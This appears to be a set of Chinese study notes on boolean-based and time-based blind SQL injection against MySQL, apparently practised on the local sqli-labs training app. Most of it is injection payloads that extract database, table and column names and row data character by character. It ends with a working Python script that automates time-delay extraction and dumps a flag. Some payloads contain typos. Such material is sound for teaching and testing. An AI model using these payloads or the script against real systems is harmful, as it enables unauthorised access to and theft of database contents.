SQL注入__布尔盲注和时间盲注

SQL注入__布尔盲注和时间盲注

布尔盲注

sql盲注二分法注入脚本

猜测数据库
?id=1' and length(database())=8-- -
?id=1' and length(database())>8-- -
当前数据库第一位 截取数据库第一位 通过Ascii码值比较
id=1' and left(database(),1)>'a' -- - 
id=1' and left(database(),1)>'z' -- - 
在a-z之间
id=1' and left(database(),1)>'r' -- -
id=1' and left(database(),1)>'s' -- -
id=1' and left(database(),2)>'sa'-- -

猜测表
id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
a是从0开始第几个表，b是为第几个字符，n是ASCII所对应的十进制数
substr("abc",1,1) 切割函数  从第一位开始切割 切割第一个 返回a
substr("abc",2,1) 切割函数  从第一位开始切割 切割第一个 返回b
substr("abc",1,2) 从第一位开始切割 切割两位 返回ab
substr("abc",0,1)  #在PHP中是从0开始，MySQL中是从1开始
第一个表
ascii(substr((select table_name from information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
(select table_name information_schema.tables where tables_schema=database() limit 0,1)返回第一个表 
substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1)切割第一位
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))=101
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 0,1),1,1))>102
第二个表
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101

判断user表

/sqlitest/Less-5/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='user' limit 0,1),1,1))>100%23

爆出字段
ascii(substr((select table_name information_schema.tables where tables_schema=database() limit 1,1),1,1))=101
ord()绕过ascii()  mid()绕过substr()

sqlitest/Less-5/?id=1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68-- -

参考：https://blog.csdn.net/weixin_53324462/article/details/113800035

时间盲注

盲注
时间盲注
sleep(X)函数，延迟X秒后回显
?id=1' and sleep(5)-- -
if（判断语句，x，y）如果判断语句正确则输出X，否则输出Y
?id=1' and if(1=1,1,sleep(1))即输出1
?id=1' and if(1=2,1,sleep(1))即延迟1秒后回显

?id=1' and if(length(database())>8,sleep(2),0)
?id=1' and if(length(database())>=8,sleep(5),1)-- -
判断库名
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0) --+
?id=1' and if(ascii(substr(database(),1,1))>95,sleep(6),1)-- -
判断表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit x,y),z,d))=e,sleep(1),0)- --
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100,sleep(2),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),1)-- -
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1))=109,sleep(3),0)--+

参考：https://blog.csdn.net/qq_51954912/article/details/116100446

时间盲注又称延迟注入，适用于页面不会返回错误信息，只会回显一种界面，其主要特征是利用sleep函数，制造时间延迟，由回显时间来判断是否报错。
官方理解：利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用，通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。
1、判断闭和符号
if（判断语句，x，y）如果判断语句正确则输出X，否则输出Y
sleep(X)函数，延迟X秒后回显
if(1=1,1,sleep(1))即输出一
if(1=2,1,sleep(1))即延迟一秒后回显
2、判断库名长度
?id=1' and if(length(database())>8,sleep(2),0) --+
3、判断库名
?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0) --+
此为判断第一个字母的ascii码是否为115
4、判断表名
?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=‘security’ limit x,y),z,d))=e,sleep(1),0)–+
其中x代表第x+1个表，y表示第x+1往后y个单位的表，z表示第几个字母，d表示z往后d个单位的字母
?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101,sleep(1),0)--+
逐个尝试
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(3),0)--+
5、判断列名
?id=1’ and If(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ and table_schema=database() limit x,y),z,d))=105,sleep(2),1)–+
x：第x+1个列，y：x+1个列往后y个单位，z：x+1列的第一个字母，d：第一个字母往后的第z个单位
?id=1' and If(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))=105,sleep(2),1)--+
逐个尝试
6、爆数据
?id=1' and If(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(2),1)--+

时间盲注脚本

import requests
import time
import datetime

url = "http://127.0.0.1/sqlilabs/Less-9/?id=1'"
#url = "http://127.0.0.1/sqlilabs/Less-4/?id=1"

def get_dbname():
    dbname = ''
    for i in range(1,9):
        for k in range(32,127):
            payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+".format(i,k)
            #payload = '") and if(ascii(substr(database(),{0},1))={1},sleep(2),1)--+'.format(i,k)
            # payload = " and if(ascii(substr(database(),{0},1))={1},sleep(2),1) --+".format(i,k)
            #if语句里面的sleep(2)为如果注入语句正确浏览器就休眠两秒，也可以和1调换位置（那样就是如果语句错误休眠两秒）
            time1 = datetime.datetime.now()
            #获得提交payload之前的时间
            res = requests.get(url + payload)
            time2 = datetime.datetime.now()
            #获得payload提交后的时间
            difference = (time2 - time1).seconds
            #time，time2时间差，seconds是只查看秒
            if difference > 1:
                dbname += chr(k)
            else:
                continue
        print("数据库名为->"+dbname)
get_dbname()

def get_table():
    table1 = ''
    table2 = ''
    table3 = ''
    table4 = ''
    for i in range(5):
        for j in range(6):
            for k in range(32,127):
                payload = "and if(ascii(substr((select table_name from information_schema.tables where table_schema=\'security\' limit %d,1),%d,1))=%d,sleep(2),1)--+"%(i,j,k)
                time1 = datetime.datetime.now()
                res = requests.get(url + payload)
                time2 = datetime.datetime.now()
                difference = (time2-time1).seconds
                if difference > 1:
                    if i == 0:
                        table1 += chr(k)
                        print("第一个表为->"+table1)
                    elif i == 1:
                        table2 += chr(k)
                        print("第二个表为->"+table2)
                    elif i == 3:
                        table3 += chr(k)
                        print("第三个表为->"+table3)
                    elif i == 4:
                        table4 += chr(k)
                        print("第四个表为->"+table4)
                    else:
                        break
get_table()

def get_column():
    column1 = ''
    column2 = ''
    column3 = ''
    for i in range(3):
        for j in range(1,9):
            for k in range(32,127):
                payload = "and if(ascii(substr((select column_name from information_schema.columns where table_name=\'flag\' limit %d,1),%d,1))=%d,sleep(2),1)--+"%(i,j,k)
                time1 = datetime.datetime.now()
                res = requests.get(url+payload)
                time2 = datetime.datetime.now()
                difference = (time2-time1).seconds
                if difference > 1:
                    if i == 0:
                        column1 += chr(k)
                        print("字段一为->"+column1)
                    if i == 1:
                        column2 += chr(k)
                        print("字段二为->"+column2)
                    if i == 2:
                        column3 += chr(k)
                        print("字段三为->"+column3)
                    else:
                        break
get_column()

def get_flag():
    flag = ''
    for i in range(30):
        for k in range(32,127):
            payload = "and if(ascii(substr((select flag from flag),%d,1))=%d,sleep(2),1)--+"%(i,k)
            time1 = datetime.datetime.now()
            res = requests.get(url+payload)
            time2 = datetime.datetime.now()
            difference = (time2-time1).seconds
            if difference > 1:
                flag += chr(k)
                print("flag为->"+flag)
get_flag()